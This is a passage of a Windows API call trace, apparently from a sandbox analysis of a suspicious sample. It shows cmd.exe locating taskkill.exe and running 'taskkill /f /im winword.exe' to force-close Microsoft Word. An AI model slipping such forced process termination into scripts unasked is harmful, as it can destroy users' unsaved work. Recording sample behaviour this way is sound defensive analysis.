HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.624] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x25f564 | out: lpFindFileData=0x25f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x431ec0 [0060.624] FindClose (in: hFindFile=0x431ec0 | out: hFindFile=0x431ec0) returned 1 [0060.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x25f564 | out: lpFindFileData=0x25f564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x431ec0 [0060.625] FindClose (in: hFindFile=0x431ec0 | out: hFindFile=0x431ec0) returned 1 [0060.625] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x25f564 | out: lpFindFileData=0x25f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x431ec0 [0060.625] FindClose (in: hFindFile=0x431ec0 | out: hFindFile=0x431ec0) returned 1 [0060.625] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.625] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.625] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.625] GetProcessHeap () returned 0x420000 [0060.625] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434bb8 | out: hHeap=0x420000) returned 1 [0060.625] GetEnvironmentStringsW () returned 0x4340c8* [0060.625] GetProcessHeap () returned 0x420000 [0060.625] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb36) returned 0x435f08 [0060.625] FreeEnvironmentStringsW (penv=0x4340c8) returned 1 [0060.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.625] GetProcessHeap () returned 0x420000 [0060.625] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4356a8 | out: hHeap=0x420000) returned 1 [0060.625] GetProcessHeap () returned 0x420000 [0060.625] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x400e) returned 0x436a48 [0060.626] GetProcessHeap () returned 0x420000 [0060.626] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x44) returned 0x431ec0 [0060.626] GetProcessHeap () returned 0x420000 [0060.626] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436a48 | out: hHeap=0x420000) returned 1 [0060.626] GetConsoleOutputCP () returned 0x1b5 [0060.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.626] GetUserDefaultLCID () returned 0x409 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x25f928, cchData=128 | out: lpLCData="0") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x25f928, cchData=128 | out: lpLCData="0") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x25f928, cchData=128 | out: lpLCData="1") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.627] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.627] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.628] GetProcessHeap () returned 0x420000 [0060.628] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x20c) returned 0x432dd0 [0060.628] GetConsoleTitleW (in: lpConsoleTitle=0x432dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.629] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.629] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.629] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.629] GetProcessHeap () returned 0x420000 [0060.629] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x400a) returned 0x436a48 [0060.629] GetProcessHeap () returned 0x420000 [0060.629] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436a48 | out: hHeap=0x420000) returned 1 [0060.630] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.630] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.630] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.630] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.630] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.630] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.630] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.630] GetProcessHeap () returned 0x420000 [0060.630] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x58) returned 0x432fe8 [0060.630] GetProcessHeap () returned 0x420000 [0060.630] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x435748 [0060.630] GetProcessHeap () returned 0x420000 [0060.630] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x30) returned 0x433048 [0060.631] GetConsoleTitleW (in: lpConsoleTitle=0x25f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.632] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.632] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.632] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.632] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.632] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.632] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.632] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.632] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.632] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.632] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.632] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.632] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.632] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.632] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.632] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.632] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.632] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.632] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.632] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.632] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.632] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.632] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.632] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.632] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.632] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.632] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.632] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.632] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.632] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.632] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.632] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.632] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.633] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.633] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.633] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.633] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.633] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.633] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.633] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.633] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.633] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.633] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.633] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.633] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.633] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.633] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.633] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.633] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.633] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.633] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.633] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.633] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.633] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.633] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.633] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.633] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.634] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.634] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.634] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.634] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.634] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.634] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.634] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.634] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.634] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.634] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.634] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.634] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.634] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.634] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.634] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.634] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.634] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.634] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.634] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.634] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.634] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.634] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.634] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.634] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.634] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.634] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.634] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.634] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.634] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.634] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.634] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.635] GetProcessHeap () returned 0x420000 [0060.635] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x210) returned 0x433080 [0060.635] GetProcessHeap () returned 0x420000 [0060.635] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x42) returned 0x433298 [0060.635] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.635] GetProcessHeap () returned 0x420000 [0060.635] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x418) returned 0x4207f0 [0060.635] SetErrorMode (uMode=0x0) returned 0x0 [0060.635] SetErrorMode (uMode=0x1) returned 0x0 [0060.635] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4207f8, lpFilePart=0x25f140 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x25f140*="Desktop") returned 0x25 [0060.635] SetErrorMode (uMode=0x0) returned 0x1 [0060.635] GetProcessHeap () returned 0x420000 [0060.635] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4207f0, Size=0x66) returned 0x4207f0 [0060.635] GetProcessHeap () returned 0x420000 [0060.635] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4207f0) returned 0x66 [0060.635] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.636] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.636] GetProcessHeap () returned 0x420000 [0060.636] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x120) returned 0x4332e8 [0060.636] GetProcessHeap () returned 0x420000 [0060.636] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x238) returned 0x420860 [0060.642] GetProcessHeap () returned 0x420000 [0060.642] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x420860, Size=0x122) returned 0x420860 [0060.642] GetProcessHeap () returned 0x420000 [0060.642] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x420860) returned 0x122 [0060.642] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.642] GetProcessHeap () returned 0x420000 [0060.642] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe0) returned 0x433410 [0060.642] GetProcessHeap () returned 0x420000 [0060.642] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x433410, Size=0x76) returned 0x433410 [0060.642] GetProcessHeap () returned 0x420000 [0060.642] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x433410) returned 0x76 [0060.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.653] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x25eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eebc) returned 0xffffffff [0060.653] GetLastError () returned 0x2 [0060.653] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x25eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eebc) returned 0xffffffff [0060.653] GetLastError () returned 0x2 [0060.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x25eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eebc) returned 0x433490 [0060.653] GetProcessHeap () returned 0x420000 [0060.653] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x4334d0 [0060.653] FindClose (in: hFindFile=0x433490 | out: hFindFile=0x433490) returned 1 [0060.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x25eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eebc) returned 0xffffffff [0060.653] GetLastError () returned 0x2 [0060.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x25eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eebc) returned 0x433490 [0060.654] GetProcessHeap () returned 0x420000 [0060.654] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4334d0, Size=0x4) returned 0x4334d0 [0060.654] FindClose (in: hFindFile=0x433490 | out: hFindFile=0x433490) returned 1 [0060.654] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.654] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.654] GetConsoleTitleW (in: lpConsoleTitle=0x25f3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.775] InitializeProcThreadAttributeList (in: lpAttributeList=0x25f23c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x25f304 | out: lpAttributeList=0x25f23c, lpSize=0x25f304) returned 1 [0060.775] UpdateProcThreadAttribute (in: lpAttributeList=0x25f23c, dwFlags=0x0, Attribute=0x60001, lpValue=0x25f2fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x25f23c, lpPreviousValue=0x0) returned 1 [0060.775] GetStartupInfoW (in: lpStartupInfo=0x25f1f8 | out: lpStartupInfo=0x25f1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.775] GetProcessHeap () returned 0x420000 [0060.775] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x18) returned 0x433490 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.776] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.777] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.777] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.777] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.777] GetProcessHeap () returned 0x420000 [0060.777] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x433490 | out: hHeap=0x420000) returned 1 [0060.777] GetProcessHeap () returned 0x420000 [0060.777] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xa) returned 0x42ff18 [0060.777] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.778] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im winword.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x25f298*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im winword.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25f2e4 | out: lpCommandLine="taskkill /f /im winword.exe", lpProcessInformation=0x25f2e4*(hProcess=0x78, hThread=0x74, dwProcessId=0x588, dwThreadId=0x5e4)) returned 1 [0060.974] CloseHandle (hObject=0x74) returned 1 [0060.974] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.974] GetProcessHeap () returned 0x420000 [0060.975] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435f08 | out: hHeap=0x420000) returned 1 [0060.975] GetEnvironmentStringsW () returned 0x435f08* [0060.975] GetProcessHeap () returned 0x420000 [0060.975] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb36) returned 0x4340c8 [0060.975] FreeEnvironmentStringsW (penv=0x435f08) returned 1 [0060.975] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.002] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x25f1d8 | out: lpExitCode=0x25f1d8*=0x80) returned 1 [0071.002] CloseHandle (hObject=0x78) returned 1 [0071.002] _vsnwprintf (in: _Buffer=0x25f320, _BufferCount=0x13, _Format="%08X", _ArgList=0x25f1e4 | out: _Buffer="00000080") returned 8 [0071.002] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.003] GetProcessHeap () returned 0x420000 [0071.003] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4340c8 | out: hHeap=0x420000) returned 1 [0071.003] GetEnvironmentStringsW () returned 0x4340c8* [0071.003] GetProcessHeap () returned 0x420000 [0071.003] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb5c) returned 0x4395b0 [0071.003] FreeEnvironmentStringsW (penv=0x4340c8) returned 1 [0071.003] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.003] GetProcessHeap () returned 0x420000 [0071.003] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4395b0 | out: hHeap=0x420000) returned 1 [0071.003] GetEnvironmentStringsW () returned 0x4340c8* [0071.003] GetProcessHeap () returned 0x420000 [0071.003] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb5c) returned 0x4395b0 [0071.003] FreeEnvironmentStringsW (penv=0x4340c8) returned 1 [0071.003] GetProcessHeap () returned 0x420000 [0071.003] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x42ff18 | out: hHeap=0x420000) returned 1 [0071.003] DeleteProcThreadAttributeList (in: lpAttributeList=0x25f23c | out: lpAttributeList=0x25f23c) [0071.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.003] SetConsoleMode 